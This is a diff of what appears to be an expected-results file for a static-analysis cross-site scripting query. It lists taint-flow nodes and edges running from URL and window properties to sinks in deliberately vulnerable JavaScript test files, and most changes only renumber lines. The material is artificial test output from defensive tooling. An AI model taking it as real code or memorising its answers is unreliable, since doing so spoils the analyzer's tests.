target | -| tst.js:430:18:430:89 | target. ... data>') | semmle.label | target. ... data>') | -| tst.js:436:6:436:38 | source | semmle.label | source | -| tst.js:436:15:436:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:440:28:440:33 | source | semmle.label | source | -| tst.js:441:33:441:38 | source | semmle.label | source | -| tst.js:442:34:442:39 | source | semmle.label | source | -| tst.js:443:41:443:46 | source | semmle.label | source | -| tst.js:444:44:444:49 | source | semmle.label | source | -| tst.js:445:32:445:37 | source | semmle.label | source | -| tst.js:453:7:453:39 | source | semmle.label | source | -| tst.js:453:16:453:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:455:18:455:23 | source | semmle.label | source | -| tst.js:456:18:456:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | -| tst.js:456:36:456:41 | source | semmle.label | source | -| tst.js:460:6:460:38 | source | semmle.label | source | -| tst.js:460:15:460:38 | documen ... .search | semmle.label | documen ... .search | -| tst.js:463:21:463:26 | source | semmle.label | source | -| tst.js:465:19:465:24 | source | semmle.label | source | -| tst.js:467:20:467:25 | source | semmle.label | source | -| tst.js:471:7:471:46 | url | semmle.label | url | -| tst.js:471:13:471:36 | documen ... .search | semmle.label | documen ... .search | -| tst.js:471:13:471:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | -| tst.js:473:19:473:21 | url | semmle.label | url | -| tst.js:474:26:474:28 | url | semmle.label | url | -| tst.js:475:25:475:27 | url | semmle.label | url | -| tst.js:476:20:476:22 | url | semmle.label | url | -| tst.js:486:22:486:24 | url | semmle.label | url | -| tst.js:491:23:491:35 | location.hash | semmle.label | location.hash | -| tst.js:491:23:491:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:494:18:494:30 | location.hash | semmle.label | location.hash | -| tst.js:494:18:494:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | -| tst.js:501:33:501:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | -| tst.js:501:43:501:62 | window.location.hash | semmle.label | window.location.hash | -| tst.js:508:7:508:39 | target | semmle.label | target | -| tst.js:508:16:508:39 | documen ... .search | semmle.label | documen ... .search | -| tst.js:509:18:509:23 | target | semmle.label | target | -| tst.js:509:18:509:54 | target. ... "), '') | semmle.label | target. ... "), '') | +| tst.js:47:16:47:45 | chop(do ... search) | semmle.label | chop(do ... search) | +| tst.js:47:21:47:44 | documen ... .search | semmle.label | documen ... .search | +| tst.js:48:16:48:32 | wrap(chop(bar())) | semmle.label | wrap(chop(bar())) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:21:48:31 | chop(bar()) | semmle.label | chop(bar()) | +| tst.js:48:26:48:30 | bar() | semmle.label | bar() | +| tst.js:50:34:50:34 | s | semmle.label | s | +| tst.js:51:18:51:18 | s | semmle.label | s | +| tst.js:53:25:53:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:54:25:54:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:56:16:56:20 | bar() | semmle.label | bar() | +| tst.js:58:1:58:27 | [,docum ... search] [1] | semmle.label | [,docum ... search] [1] | +| tst.js:58:3:58:26 | documen ... .search | semmle.label | documen ... .search | +| tst.js:58:46:58:46 | x | semmle.label | x | +| tst.js:60:20:60:20 | x | semmle.label | x | +| tst.js:63:49:63:72 | documen ... .search | semmle.label | documen ... .search | +| tst.js:67:26:67:49 | documen ... .search | semmle.label | documen ... .search | +| tst.js:68:25:68:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:70:33:70:56 | documen ... .search | semmle.label | documen ... .search | +| tst.js:71:32:71:55 | documen ... .search | semmle.label | documen ... .search | +| tst.js:76:39:76:62 | documen ... .search | semmle.label | documen ... .search | +| tst.js:82:30:82:53 | documen ... .search | semmle.label | documen ... .search | +| tst.js:88:25:88:48 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:7:93:44 | v | semmle.label | v | +| tst.js:93:11:93:34 | documen ... .search | semmle.label | documen ... .search | +| tst.js:93:11:93:44 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:95:18:95:18 | v | semmle.label | v | +| tst.js:120:18:120:18 | v | semmle.label | v | +| tst.js:132:29:132:50 | window. ... .search | semmle.label | window. ... .search | +| tst.js:135:29:135:29 | v | semmle.label | v | +| tst.js:135:49:135:49 | v | semmle.label | v | +| tst.js:139:29:139:46 | xssSourceService() | semmle.label | xssSourceService() | +| tst.js:142:40:142:61 | window. ... .search | semmle.label | window. ... .search | +| tst.js:161:9:161:41 | target | semmle.label | target | +| tst.js:161:18:161:41 | documen ... .search | semmle.label | documen ... .search | +| tst.js:164:28:164:33 | target | semmle.label | target | +| tst.js:168:9:168:42 | tainted | semmle.label | tainted | +| tst.js:168:19:168:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:170:31:170:37 | tainted | semmle.label | tainted | +| tst.js:172:42:172:48 | tainted | semmle.label | tainted | +| tst.js:173:33:173:39 | tainted | semmle.label | tainted | +| tst.js:175:54:175:60 | tainted | semmle.label | tainted | +| tst.js:176:45:176:51 | tainted | semmle.label | tainted | +| tst.js:177:49:177:55 | tainted | semmle.label | tainted | +| tst.js:181:9:181:42 | tainted | semmle.label | tainted | +| tst.js:181:19:181:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:183:67:183:73 | tainted | semmle.label | tainted | +| tst.js:184:67:184:73 | tainted | semmle.label | tainted | +| tst.js:188:35:188:41 | tainted | semmle.label | tainted | +| tst.js:190:46:190:52 | tainted | semmle.label | tainted | +| tst.js:191:38:191:44 | tainted | semmle.label | tainted | +| tst.js:192:35:192:41 | tainted | semmle.label | tainted | +| tst.js:196:28:196:46 | this.state.tainted1 | semmle.label | this.state.tainted1 | +| tst.js:197:28:197:46 | this.state.tainted2 | semmle.label | this.state.tainted2 | +| tst.js:198:28:198:46 | this.state.tainted3 | semmle.label | this.state.tainted3 | +| tst.js:202:32:202:49 | prevState.tainted4 | semmle.label | prevState.tainted4 | +| tst.js:209:28:209:46 | this.props.tainted1 | semmle.label | this.props.tainted1 | +| tst.js:210:28:210:46 | this.props.tainted2 | semmle.label | this.props.tainted2 | +| tst.js:211:28:211:46 | this.props.tainted3 | semmle.label | this.props.tainted3 | +| tst.js:215:32:215:49 | prevProps.tainted4 | semmle.label | prevProps.tainted4 | +| tst.js:220:35:220:41 | tainted | semmle.label | tainted | +| tst.js:222:20:222:26 | tainted | semmle.label | tainted | +| tst.js:224:23:224:29 | tainted | semmle.label | tainted | +| tst.js:225:23:225:29 | tainted | semmle.label | tainted | +| tst.js:231:39:231:55 | props.propTainted | semmle.label | props.propTainted | +| tst.js:235:60:235:82 | this.st ... Tainted | semmle.label | this.st ... Tainted | +| tst.js:239:23:239:29 | tainted | semmle.label | tainted | +| tst.js:243:7:243:17 | window.name | semmle.label | window.name | +| tst.js:244:7:244:10 | name | semmle.label | name | +| tst.js:248:11:248:21 | window.name | semmle.label | window.name | +| tst.js:264:22:264:29 | location | semmle.label | location | +| tst.js:269:9:269:29 | tainted | semmle.label | tainted | +| tst.js:269:19:269:29 | window.name | semmle.label | window.name | +| tst.js:272:59:272:65 | tainted | semmle.label | tainted | +| tst.js:285:9:285:16 | location | semmle.label | location | +| tst.js:286:10:286:10 | e | semmle.label | e | +| tst.js:287:20:287:20 | e | semmle.label | e | +| tst.js:292:10:292:17 | location | semmle.label | location | +| tst.js:294:10:294:10 | e | semmle.label | e | +| tst.js:295:20:295:20 | e | semmle.label | e | +| tst.js:300:35:300:42 | location | semmle.label | location | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | semmle.label | new URL ... cation) [searchParams, MapValue] | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | semmle.label | new URL ... cation) [searchParams] | +| tst.js:311:18:311:34 | document.location | semmle.label | document.location | +| tst.js:315:7:315:43 | params | semmle.label | params | +| tst.js:315:7:315:43 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | semmle.label | getTaintedUrl() [searchParams, MapValue] | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | semmle.label | getTaintedUrl() [searchParams] | +| tst.js:315:16:315:43 | getTain ... hParams | semmle.label | getTain ... hParams | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | semmle.label | getTain ... hParams [MapValue] | +| tst.js:316:18:316:23 | params | semmle.label | params | +| tst.js:316:18:316:23 | params [MapValue] | semmle.label | params [MapValue] | +| tst.js:316:18:316:35 | params.get('name') | semmle.label | params.get('name') | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | semmle.label | new URL ... cation) [hash] | +| tst.js:325:20:325:36 | document.location | semmle.label | document.location | +| tst.js:327:5:327:12 | getUrl() [hash] | semmle.label | getUrl() [hash] | +| tst.js:327:5:327:17 | getUrl().hash | semmle.label | getUrl().hash | +| tst.js:327:5:327:30 | getUrl( ... ring(1) | semmle.label | getUrl( ... ring(1) | +| tst.js:332:7:332:39 | target | semmle.label | target | +| tst.js:332:16:332:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:333:12:333:17 | target | semmle.label | target | +| tst.js:339:10:339:42 | target | semmle.label | target | +| tst.js:339:19:339:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:340:16:340:21 | target | semmle.label | target | +| tst.js:341:20:341:25 | target | semmle.label | target | +| tst.js:344:21:344:26 | target | semmle.label | target | +| tst.js:347:18:347:23 | target | semmle.label | target | +| tst.js:355:7:355:39 | target | semmle.label | target | +| tst.js:355:16:355:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:357:18:357:23 | target | semmle.label | target | +| tst.js:364:7:364:39 | target | semmle.label | target | +| tst.js:364:16:364:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:367:18:367:23 | target | semmle.label | target | +| tst.js:369:18:369:23 | target | semmle.label | target | +| tst.js:369:18:369:29 | target.taint | semmle.label | target.taint | +| tst.js:374:3:374:8 | [post update] target [taint3] | semmle.label | [post update] target [taint3] | +| tst.js:374:19:374:42 | documen ... .search | semmle.label | documen ... .search | +| tst.js:375:18:375:23 | target [taint3] | semmle.label | target [taint3] | +| tst.js:375:18:375:30 | target.taint3 | semmle.label | target.taint3 | +| tst.js:380:18:380:23 | target | semmle.label | target | +| tst.js:380:18:380:30 | target.taint5 | semmle.label | target.taint5 | +| tst.js:389:18:389:23 | target | semmle.label | target | +| tst.js:389:18:389:30 | target.taint7 | semmle.label | target.taint7 | +| tst.js:391:3:391:8 | [post update] target [taint8] | semmle.label | [post update] target [taint8] | +| tst.js:391:19:391:24 | target | semmle.label | target | +| tst.js:391:19:391:24 | target [taint8] | semmle.label | target [taint8] | +| tst.js:391:19:391:31 | target.taint8 | semmle.label | target.taint8 | +| tst.js:392:18:392:23 | target [taint8] | semmle.label | target [taint8] | +| tst.js:392:18:392:30 | target.taint8 | semmle.label | target.taint8 | +| tst.js:399:7:399:46 | payload | semmle.label | payload | +| tst.js:399:17:399:36 | window.location.hash | semmle.label | window.location.hash | +| tst.js:399:17:399:46 | window. ... bstr(1) | semmle.label | window. ... bstr(1) | +| tst.js:400:18:400:24 | payload | semmle.label | payload | +| tst.js:402:7:402:55 | match | semmle.label | match | +| tst.js:402:15:402:34 | window.location.hash | semmle.label | window.location.hash | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | semmle.label | window. ... (\\w+)/) | +| tst.js:404:20:404:24 | match | semmle.label | match | +| tst.js:404:20:404:27 | match[1] | semmle.label | match[1] | +| tst.js:407:18:407:37 | window.location.hash | semmle.label | window.location.hash | +| tst.js:407:18:407:48 | window. ... it('#') [1] | semmle.label | window. ... it('#') [1] | +| tst.js:407:18:407:51 | window. ... '#')[1] | semmle.label | window. ... '#')[1] | +| tst.js:411:7:411:39 | target | semmle.label | target | +| tst.js:411:16:411:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:413:18:413:23 | target | semmle.label | target | +| tst.js:413:18:413:89 | target. ... data>') | semmle.label | target. ... data>') | +| tst.js:419:6:419:38 | source | semmle.label | source | +| tst.js:419:15:419:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:423:28:423:33 | source | semmle.label | source | +| tst.js:424:33:424:38 | source | semmle.label | source | +| tst.js:425:34:425:39 | source | semmle.label | source | +| tst.js:426:41:426:46 | source | semmle.label | source | +| tst.js:427:44:427:49 | source | semmle.label | source | +| tst.js:428:32:428:37 | source | semmle.label | source | +| tst.js:436:7:436:39 | source | semmle.label | source | +| tst.js:436:16:436:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:438:18:438:23 | source | semmle.label | source | +| tst.js:439:18:439:42 | ansiToH ... source) | semmle.label | ansiToH ... source) | +| tst.js:439:36:439:41 | source | semmle.label | source | +| tst.js:443:6:443:38 | source | semmle.label | source | +| tst.js:443:15:443:38 | documen ... .search | semmle.label | documen ... .search | +| tst.js:446:21:446:26 | source | semmle.label | source | +| tst.js:448:19:448:24 | source | semmle.label | source | +| tst.js:450:20:450:25 | source | semmle.label | source | +| tst.js:454:7:454:46 | url | semmle.label | url | +| tst.js:454:13:454:36 | documen ... .search | semmle.label | documen ... .search | +| tst.js:454:13:454:46 | documen ... bstr(1) | semmle.label | documen ... bstr(1) | +| tst.js:456:19:456:21 | url | semmle.label | url | +| tst.js:457:26:457:28 | url | semmle.label | url | +| tst.js:458:25:458:27 | url | semmle.label | url | +| tst.js:459:20:459:22 | url | semmle.label | url | +| tst.js:469:22:469:24 | url | semmle.label | url | +| tst.js:474:23:474:35 | location.hash | semmle.label | location.hash | +| tst.js:474:23:474:45 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:477:18:477:30 | location.hash | semmle.label | location.hash | +| tst.js:477:18:477:40 | locatio ... bstr(1) | semmle.label | locatio ... bstr(1) | +| tst.js:484:33:484:63 | decodeU ... n.hash) | semmle.label | decodeU ... n.hash) | +| tst.js:484:43:484:62 | window.location.hash | semmle.label | window.location.hash | +| tst.js:491:7:491:39 | target | semmle.label | target | +| tst.js:491:16:491:39 | documen ... .search | semmle.label | documen ... .search | +| tst.js:492:18:492:23 | target | semmle.label | target | +| tst.js:492:18:492:54 | target. ... "), '') | semmle.label | target. ... "), '') | | typeahead.js:9:28:9:30 | loc | semmle.label | loc | | typeahead.js:10:16:10:18 | loc | semmle.label | loc | | typeahead.js:20:13:20:45 | target | semmle.label | target | @@ -831,8 +831,8 @@ edges | jwt-server.js:7:9:7:35 | taint | jwt-server.js:9:16:9:20 | taint | provenance | | | jwt-server.js:7:17:7:35 | req.param("wobble") | jwt-server.js:7:9:7:35 | taint | provenance | | | jwt-server.js:9:16:9:20 | taint | jwt-server.js:9:55:9:61 | decoded | provenance | | -| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:11:19:11:25 | decoded | provenance | | -| jwt-server.js:11:19:11:25 | decoded | jwt-server.js:11:19:11:29 | decoded.foo | provenance | | +| jwt-server.js:9:55:9:61 | decoded | jwt-server.js:10:19:10:25 | decoded | provenance | | +| jwt-server.js:10:19:10:25 | decoded | jwt-server.js:10:19:10:29 | decoded.foo | provenance | | | jwt.js:4:36:4:39 | data | jwt.js:5:30:5:33 | data | provenance | | | jwt.js:5:9:5:34 | decoded | jwt.js:6:14:6:20 | decoded | provenance | | | jwt.js:5:19:5:34 | jwt_decode(data) | jwt.js:5:9:5:34 | decoded | provenance | | @@ -943,8 +943,8 @@ edges | tooltip.jsx:22:20:22:30 | window.name | tooltip.jsx:22:11:22:30 | source | provenance | | | translate.js:6:7:6:39 | target | translate.js:7:42:7:47 | target | provenance | | | translate.js:6:16:6:39 | documen ... .search | translate.js:6:7:6:39 | target | provenance | | -| translate.js:7:7:7:61 | searchParams | translate.js:9:27:9:38 | searchParams | provenance | | -| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:9:27:9:38 | searchParams [MapValue] | provenance | | +| translate.js:7:7:7:61 | searchParams | translate.js:8:27:8:38 | searchParams | provenance | | +| translate.js:7:7:7:61 | searchParams [MapValue] | translate.js:8:27:8:38 | searchParams [MapValue] | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) | translate.js:7:7:7:61 | searchParams | provenance | | | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | translate.js:7:7:7:61 | searchParams [MapValue] | provenance | | | translate.js:7:42:7:47 | target | translate.js:7:42:7:60 | target.substring(1) | provenance | | @@ -954,8 +954,8 @@ edges | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | | translate.js:7:42:7:60 | target.substring(1) | translate.js:7:22:7:61 | new URL ... ing(1)) [MapValue] | provenance | | -| translate.js:9:27:9:38 | searchParams | translate.js:9:27:9:50 | searchP ... 'term') | provenance | Config | -| translate.js:9:27:9:38 | searchParams [MapValue] | translate.js:9:27:9:50 | searchP ... 'term') | provenance | | +| translate.js:8:27:8:38 | searchParams | translate.js:8:27:8:50 | searchP ... 'term') | provenance | Config | +| translate.js:8:27:8:38 | searchParams [MapValue] | translate.js:8:27:8:50 | searchP ... 'term') | provenance | | | trusted-types-lib.js:1:28:1:28 | x | trusted-types-lib.js:2:12:2:12 | x | provenance | | | trusted-types.js:3:62:3:62 | x | trusted-types.js:3:67:3:67 | x | provenance | | | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:62:3:62 | x | provenance | | @@ -973,217 +973,217 @@ edges | tst3.js:7:32:7:35 | data | tst3.js:7:32:7:37 | data.p | provenance | | | tst3.js:9:37:9:40 | data | tst3.js:9:37:9:42 | data.p | provenance | | | tst3.js:10:38:10:41 | data | tst3.js:10:38:10:43 | data.p | provenance | | -| tst.js:2:7:2:39 | target | tst.js:5:18:5:23 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:12:28:12:33 | target | provenance | | -| tst.js:2:7:2:39 | target | tst.js:20:42:20:47 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:4:18:4:23 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:9:28:9:33 | target | provenance | | +| tst.js:2:7:2:39 | target | tst.js:17:42:17:47 | target | provenance | | | tst.js:2:16:2:39 | documen ... .search | tst.js:2:7:2:39 | target | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | | -| tst.js:8:37:8:58 | documen ... on.href | tst.js:8:37:8:114 | documen ... t=")+8) | provenance | Config | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | | -| tst.js:8:37:8:114 | documen ... t=")+8) | tst.js:8:18:8:126 | "" | provenance | Config | -| tst.js:12:28:12:33 | target | tst.js:12:5:12:42 | '
' | provenance | Config | -| tst.js:17:7:17:56 | params | tst.js:18:18:18:23 | params | provenance | | -| tst.js:17:7:17:56 | params [MapValue] | tst.js:18:18:18:23 | params [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | provenance | | -| tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | tst.js:17:16:17:56 | (new UR ... hParams | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams | tst.js:17:7:17:56 | params | provenance | | -| tst.js:17:16:17:56 | (new UR ... hParams [MapValue] | tst.js:17:7:17:56 | params [MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | -| tst.js:17:17:17:42 | new URL ... cation) [searchParams] | tst.js:17:16:17:43 | (new UR ... ation)) [searchParams] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams, MapValue] | provenance | | -| tst.js:17:25:17:41 | document.location | tst.js:17:17:17:42 | new URL ... cation) [searchParams] | provenance | | -| tst.js:18:18:18:23 | params | tst.js:18:18:18:35 | params.get('name') | provenance | Config | -| tst.js:18:18:18:23 | params [MapValue] | tst.js:18:18:18:35 | params.get('name') | provenance | | -| tst.js:20:7:20:61 | searchParams | tst.js:21:18:21:29 | searchParams | provenance | | -| tst.js:20:7:20:61 | searchParams [MapValue] | tst.js:21:18:21:29 | searchParams [MapValue] | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) | tst.js:20:7:20:61 | searchParams | provenance | | -| tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | tst.js:20:7:20:61 | searchParams [MapValue] | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:47 | target | tst.js:20:42:20:60 | target.substring(1) | provenance | Config | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:20:42:20:60 | target.substring(1) | tst.js:20:22:20:61 | new URL ... ing(1)) [MapValue] | provenance | | -| tst.js:21:18:21:29 | searchParams | tst.js:21:18:21:41 | searchP ... 'name') | provenance | Config | -| tst.js:21:18:21:29 | searchParams [MapValue] | tst.js:21:18:21:41 | searchP ... 'name') | provenance | | -| tst.js:24:14:24:19 | target | tst.js:26:18:26:23 | target | provenance | | -| tst.js:28:5:28:28 | documen ... .search | tst.js:24:14:24:19 | target | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:58:26:58:30 | bar() | provenance | | -| tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | provenance | | -| tst.js:36:14:36:14 | x | tst.js:37:10:37:10 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:36:14:36:14 | x | provenance | | -| tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:42:15:42:15 | s | tst.js:43:20:43:20 | s | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | | -| tst.js:43:20:43:20 | s | tst.js:43:10:43:31 | "
" ...
" | provenance | Config | -| tst.js:46:21:46:44 | documen ... .search | tst.js:42:15:42:15 | s | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | | -| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | provenance | Config | -| tst.js:48:15:48:15 | s | tst.js:50:12:50:12 | s | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:50:12:50:12 | s | tst.js:50:12:50:22 | s.substr(1) | provenance | Config | -| tst.js:54:21:54:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | | -| tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | provenance | Config | -| tst.js:56:21:56:44 | documen ... .search | tst.js:48:15:48:15 | s | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | | -| tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | provenance | Config | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:42:15:42:15 | s | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | | -| tst.js:58:21:58:31 | chop(bar()) | tst.js:58:16:58:32 | wrap(chop(bar())) | provenance | Config | -| tst.js:58:26:58:30 | bar() | tst.js:48:15:48:15 | s | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | | -| tst.js:58:26:58:30 | bar() | tst.js:58:21:58:31 | chop(bar()) | provenance | Config | -| tst.js:60:34:60:34 | s | tst.js:62:18:62:18 | s | provenance | | -| tst.js:64:25:64:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:65:25:65:48 | documen ... .search | tst.js:60:34:60:34 | s | provenance | | -| tst.js:70:1:70:27 | [,docum ... search] [1] | tst.js:70:46:70:46 | x | provenance | | -| tst.js:70:3:70:26 | documen ... .search | tst.js:70:1:70:27 | [,docum ... search] [1] | provenance | | -| tst.js:70:46:70:46 | x | tst.js:73:20:73:20 | x | provenance | | -| tst.js:107:7:107:44 | v | tst.js:110:18:110:18 | v | provenance | | -| tst.js:107:7:107:44 | v | tst.js:136:18:136:18 | v | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | | -| tst.js:107:11:107:34 | documen ... .search | tst.js:107:11:107:44 | documen ... bstr(1) | provenance | Config | -| tst.js:107:11:107:44 | documen ... bstr(1) | tst.js:107:7:107:44 | v | provenance | | -| tst.js:148:29:148:50 | window. ... .search | tst.js:151:29:151:29 | v | provenance | | -| tst.js:151:29:151:29 | v | tst.js:151:49:151:49 | v | provenance | | -| tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | provenance | | -| tst.js:177:9:177:41 | target | tst.js:180:28:180:33 | target | provenance | | -| tst.js:177:18:177:41 | documen ... .search | tst.js:177:9:177:41 | target | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:186:31:186:37 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:188:42:188:48 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:189:33:189:39 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:191:54:191:60 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:192:45:192:51 | tainted | provenance | | -| tst.js:184:9:184:42 | tainted | tst.js:193:49:193:55 | tainted | provenance | | -| tst.js:184:19:184:42 | documen ... .search | tst.js:184:9:184:42 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:199:67:199:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:197:9:197:42 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:197:19:197:42 | documen ... .search | tst.js:197:9:197:42 | tainted | provenance | | -| tst.js:199:67:199:73 | tainted | tst.js:200:67:200:73 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:204:35:204:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:206:46:206:52 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:207:38:207:44 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:208:35:208:41 | tainted | provenance | | -| tst.js:200:67:200:73 | tainted | tst.js:236:35:236:41 | tainted | provenance | | -| tst.js:204:35:204:41 | tainted | tst.js:212:28:212:46 | this.state.tainted1 | provenance | | -| tst.js:206:46:206:52 | tainted | tst.js:213:28:213:46 | this.state.tainted2 | provenance | | -| tst.js:207:38:207:44 | tainted | tst.js:214:28:214:46 | this.state.tainted3 | provenance | | -| tst.js:208:35:208:41 | tainted | tst.js:218:32:218:49 | prevState.tainted4 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:225:28:225:46 | this.props.tainted1 | provenance | | -| tst.js:236:35:236:41 | tainted | tst.js:238:20:238:26 | tainted | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:226:28:226:46 | this.props.tainted2 | provenance | | -| tst.js:238:20:238:26 | tainted | tst.js:240:23:240:29 | tainted | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:227:28:227:46 | this.props.tainted3 | provenance | | -| tst.js:240:23:240:29 | tainted | tst.js:241:23:241:29 | tainted | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:231:32:231:49 | prevProps.tainted4 | provenance | | -| tst.js:241:23:241:29 | tainted | tst.js:255:23:255:29 | tainted | provenance | | -| tst.js:247:39:247:55 | props.propTainted | tst.js:251:60:251:82 | this.st ... Tainted | provenance | | -| tst.js:255:23:255:29 | tainted | tst.js:247:39:247:55 | props.propTainted | provenance | | -| tst.js:285:9:285:29 | tainted | tst.js:288:59:288:65 | tainted | provenance | | -| tst.js:285:19:285:29 | window.name | tst.js:285:9:285:29 | tainted | provenance | | -| tst.js:301:9:301:16 | location | tst.js:302:10:302:10 | e | provenance | | -| tst.js:302:10:302:10 | e | tst.js:303:20:303:20 | e | provenance | | -| tst.js:308:10:308:17 